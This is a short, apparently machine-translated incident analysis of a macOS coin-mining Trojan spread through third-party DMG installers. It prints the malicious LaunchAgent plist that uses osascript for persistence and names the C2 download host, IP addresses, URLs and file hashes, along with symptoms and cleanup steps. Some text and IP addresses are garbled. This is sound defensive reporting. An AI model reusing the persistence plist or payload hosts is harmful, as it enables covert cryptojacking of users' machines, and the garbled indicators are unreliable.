Mac next door A brief analysis of the coin-mining Trojan

Background

Recently in the emergency found a Mac on the mining Trojan, the goal is to dig the door, after the visit, the victim users have to install a third-party DMG from the Apple Computer experience (which can be determined a LOL Mac install app will cause the Trojan), Suspected that many third-party DMG on the Internet are carrying related malicious programs.

Phenomenon

According to the user reflects the user generally have the following several symptoms:

• High CPU Share
• System Card Dayton
• Activity Monitor won't open.
• Computer overheating

Trojan infection

After a brief analysis, suspected that the Trojan originated in the third-party installation package, during the decompression installation process, generated a disguised as 11.png (name can be changed) malicious files and com.apple.Yahoo.plist (~/library/launchagents/directory) Files and com.apple.Google.plist (~/library/launchagents/directory) files

• Com.apple.Google.plist (Startup item configuration) file as follows, it directs Com.apple.Yahoo.plist to execute

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict>    <key>Label</key>    <string>com.apple.Google</string>    <key>Program</key>    <string>/usr/bin/osascript</string>    <key>ProgramArguments</key>    <array>        <string>osascript</string>        <string>-e</string>        <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>    </array>    <key>RunAtLoad</key>    <true/>    <key>StartInterval</key>    <integer>31104000</integer>    <key>WatchPaths</key>    <array/></dict></plist>

Start

Find an additional PNG file that is certified to run with the 11.png effect consistent with that Trojan's AppleScript file.
After the file runs, it will go to ondayon.com:8080 to download the following malicious files

Path: Under ~/library/safari directory

• Ssl.plist (Mining procedure)
• Pools.txt
• Cpu.txt
• Config.txt

[email protected]  1 xxxxxx  staff   788212  8 17 16:08 ssl.plist[email protected]  1 xxxxxx  staff      343  8 17 16:08 config.txt[email protected]  1 xxxxxx  staff      229  8 17 16:08 pools.txt[email protected]  1 xxxxxx  staff      256  8 17 16:08 cpu.txt

And in the corresponding ~/library/safari/openssl/lib/directory
Libcrypto.1.0.0.dylib
Libssl.1.0.0.dylib

[email protected]  4 xxxxxx  staff   128  5 30 16:51 .[email protected]  3 xxxxxx  staff      96 5 30 16:51 ..[email protected]  1 xxxxxx  staff    385152  9 29  2017 libssl.1.0.0.dylib[email protected]  1 xxxxxx  staff    1767648  9 29  2017 libcrypto.1.0.0.dylib

Digging mine

Ssl.plist is the xmr of the post-compilation mining from the program, mainly for mining.

Emergency Repair

• Delete all the files mentioned above and kill the related process;

• Find the third-party DMG or other third-party app installation package you downloaded and install, and then delete it if you have any problems.

  Related IOCIP Address

43.294.204.18345.195.146.32101.55.20.149

# Domain

ondayon.com

Url

http://ondayon.com:8080/ssl.ziphttp://101.55.20.149/ssl.ziphttp://101.55.20.149/gogoto.pnghttp://101.55.20.149/8/Build.zip

Hash

0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697(ibcrypto.1.0.0.dylib)fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804(ssl.plist)c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3(libssl.1.0.0.dylib)f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce(ondayon.png) 5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b(Install-LOL.app.zip)2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150(Build.zip)6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d(x.x)ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f(com.apple.Yahoo.plist)2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7(com.apple.Google.plist)

Mac next door A brief analysis of the coin-mining Trojan